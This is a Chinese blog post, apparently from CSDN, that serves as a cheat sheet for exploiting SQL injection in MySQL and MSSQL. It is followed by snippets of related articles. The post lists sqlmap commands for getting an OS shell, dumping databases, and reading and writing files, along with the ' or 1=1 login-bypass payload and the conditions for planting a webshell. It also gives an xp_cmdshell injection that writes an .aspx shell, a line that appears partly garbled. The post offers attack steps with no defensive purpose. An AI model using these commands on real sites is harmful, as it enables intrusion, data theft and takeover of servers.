如何利用mysql漏洞进行sql注入_sql注入漏洞的利用

最新推荐文章于 2024-07-10 18:22:30 发布
最新推荐文章于 2024-07-10 18:22:30 发布
阅读量302 收藏
点赞数
文章标签: 如何利用mysql漏洞进行sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42541463/article/details/113714080
版权

漏洞的利用(sqlmap)

数据库提权

1.可以直接获取shell,可能会获取系统权限

sqlmap -d "mysql://root:root@ip/数据库" --os-shell

2.Mysql可以使用sql-shell然后进行udf提权

万能密码登录

' or 1=1 '

数据库dump

-u 检测注入点

--current-db 查看当前数据库

--current-user 查看当前用户

--Tables

--columns

--dump

读写文件(需要有读写权限,和secure_file_priv有关)

--file-read 读取文件

--file-write 可以上传本地文件(参数接上本地的shell)

--file-dest 写入到目标文件(参数接上入侵网站的地址)

获取webshell条件

1.php+MySQL 类型网站获取 webshell 条件

(1)MySQL root 账号权限,也就配置 MySQL 连接的账号为 root 账号,不是 root 账号具

备 root 权限也可以。

(2)GPC 配置关闭,能使用单引号

(3)有网站的绝对路径,且具备可以在文件夹写入文件的权限

(4)没有配置 secure-file-priv 属性

2.MSSQL+ASP/Asp.net 类型网站获取 webshell 条件

(1)数据库用户是 sa

(2)能够创建 xp_cmdshell,有的情况下虽然是 sa 账号,也能连接,但无法使用

xp_cmdshell。 (3)知道真实路径

(4)可以通过 echo 命令来生成 shell

注入点直接写

;exec master..xp_cmdshell 'echo ^

Language="Jscript"%> >

c:\WWW\233.aspx' ;--

命令行下:

echo ^ >

c:\WWW\233.aspx'

sqlmap获取webshell

1.--os-shell

(1)直接连接数据库(需要设置可以允许外来用户登录)

(2)知道绝对路径,并且用户有可写权限

2.msf反弹shell(可写权限和路径)

上传木马文件,然后反弹shell

3.上传shell

通过sqlmap获取的账号和后台密码上传shell

协和临床营养科陈
关注
mysql sql注入漏洞修复_SQL注入漏洞解析与靶场复现
weixin_36043375的博客
02-26 1263
1. 概述SQL注入(SQL Injectioin)漏洞是注入漏洞中危害性最高的漏洞之一。形成的原因主要是在数据交互过程中,前端的数据传入后端时,没有作严格的验证过滤导致传入的“数据”拼接到了SQL语句中。被数据库当作SQL语句的一部分执行,从而使得数据面临被脱库、恶意破坏篡改甚至造成整个系统权限沦陷等一系列危害。注入攻击的本质是把用户输入的数据当作代码执行。造成注入攻击有两个关键条件:①用户能够...
php is_numberic函数造成的SQL注入漏洞
01-21
一、is_numberic函数简介国内一部分CMS程序里面有用到过is_numberic函数,我们先看看这个函数的结构bool is_numeric (mixed $var)如果 ... //是 values($s) 不是values(‘$s’)mysql_query($sql);上面这个片段程序是判
利用SQL注入漏洞拖库
12-25
利用SQL注入漏洞拖库 - 利用 SQL 注入漏洞拖库的方法 1 建立数据库和表 建立数据库 lab。 在 lab 数据库创建一张表 article
MySQL数据库渗透及漏洞利用总结
05-09 4215
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和W...
SQL注入漏洞利用
最新发布
2201_75735270的博客
07-10 982
SQL注入是一种注入攻击,可以执行恶意SQL语句。这些语句控制Web应用程序后面的数据库服务器。攻击者可以利用SQL 注入漏洞规避应用程序安全性方面的努力。他们可以绕过页面或Web应用程序的身份验证和授权,并恢复整个SQL数据库的内容。他们同样可以利用SQL注入来包含,更改和擦除数据库中的记录。SQL注入漏洞可能会影响使用SQL数据库的任何站点或Web应用程序,例如MySQL,Oracle,MSSQL或其他。
浅谈SQL注入漏洞原理及利用方式
ZL_1618的博客
06-08 445
在数据交互中,前端的数据传入到后台处理时,由于后端没有做严格的判断,导致其传入的恶意“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。漏洞产生于脚本,注入是针对数据库进行。1.参数用户可控:从前端传给后端的参数内容是用户可以控制的。2.参数带入数据库查询:传入的参数拼接到 SQL 语句,且带入数据库查询。通过SQL注入漏洞,可以查询数据、下载数据、写入webshell 、执行系统命令以及绕过登录限制等。联合注入≥报错注入>DNSlog注入>布尔注入>延时注入。
SQL注入漏洞全接触.ppt
11-15
* 根据不同的数据库管理系统, SQL注入漏洞可以分为Access注入、SQL Server注入、MySQL注入等。 * 不同的数据库管理系统有不同的函数、注入方法,所以在注入之前,我们还要判断一下数据库的类型。 四、 SQL注入漏洞...
php mysql_real_escape_string addslashes及mysql绑定参数防SQL注入攻击
10-20
它的作用主要是防止恶意用户通过输入的特殊字符对SQL语句进行篡改,导致SQL注入攻击。需要注意的是,mysql_real_escape_string函数可能会因为字符编码的问题导致安全漏洞。例如,如果输入的name值为name=41%bf%27%20...
php中sql注入漏洞示例 sql注入漏洞修复
10-26
由于PHP通常用于Web开发,并且经常与MySQL数据库结合使用,因此SQL注入漏洞在PHP应用中尤为突出。 在PHP中,SQL注入漏洞常见于各种用户输入的处理环节,尤其是在处理登录界面、留言板、搜索框等用户可输入数据的...
Mysql漏洞利用(越权,实战怎么从低权限拿到root密码)
07-30
Mysql漏洞利用(越权,实战怎么从低权限拿到root密码)
MySql注入漏洞
weixin_44906495的博客
04-20 1574
1、简介   1.1、SQL注入的本质   web程序代码中对于用户提交的参数未做过滤就直接放到SQL语句中执行,导致参数中的特殊字符打破了SQL语句原有逻辑,黑客可以利用漏洞执行任意SQL语句.      1.2、什么是SQL注入   1.是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击   2.这些参数传递给后台的SQL数据库服务器加以解析并执行.      1...
SQL注入漏洞原理及利用
weixin_68254517的博客
10-29 196
中的密码部分替换成所设置的MYSQL root用户的密码(此处为空,直接把'p@ssw0rd'改为' '就行了,即密码为空),再创建数据库即可。在注入时,攻击者可以使用 “–” 来注释掉原 SQL 语句的结尾,然后添加自己的恶意 SQL 语句。上面查询语句中,“–” 用于注释掉 SQL 语句的结尾,导致后面输入的密码被忽略。就攻击本质而言,SQL注入攻击利用的工具是SQL语法,针对的是应用程序开发者编程中的漏洞。现实攻击场景下,攻击者是无法看到后端代码的,所以以下的注入是建立在无法看到源代码的情况下的。
SQL注入漏洞
Flonan的博客
03-17 683
SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击. SQL注入的发生: 当应用程序使用输入内容来构造动态sql语句以访问数据库时,会发生sql注入攻击。如果代码使用存储过程,而这些存储过程作为包含未筛选的...
SQL注入原理及漏洞利用(入门级)
Hardworking666的博客
02-26 7537
攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。SQL注入原理服务端没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全。SQL注入过程SQL注入带来的危害绕过登录验证:使用万能密码登录网站后台等获取敏感数据:获取网站管理员帐号、密码等文件系统操作:列目录,读取、写入文件等。
sql注入原理
LVXIANGAN的专栏
05-27 1352
所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击.
sql注入漏洞简单讲解与实战
Lenovoliao的博客
04-10 2084
SQL注入(SQL Injection)是一种常见的网络安全漏洞,攻击者利用漏洞向应用程序的数据库发送恶意的SQL查询,从而绕过身份验证、获取敏感数据或者对数据库进行修改。SQL注入通常发生在与数据库交互的Web应用程序中,尤其是那些直接将用户输入拼接到SQL查询语句中的应用程序。攻击者利用SQL注入漏洞时,常常通过在输入字段中插入SQL代码来干扰、扩展或篡改原始SQL查询的执行。这种攻击可以使攻击者获得未经授权的数据访问权限,例如用户凭证、个人信息或者敏感业务数据。
MySQL SQL注入:information_schema数据库的利用与解析
接着,他们可以查询TABLES和COLUMNS表,找出mysql数据库中的表及其列,以便进一步利用SQL注入漏洞。 因此,对information_schema数据库的理解和有效利用对于防御者和攻击者都至关重要。防御者需要确保限制对这个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值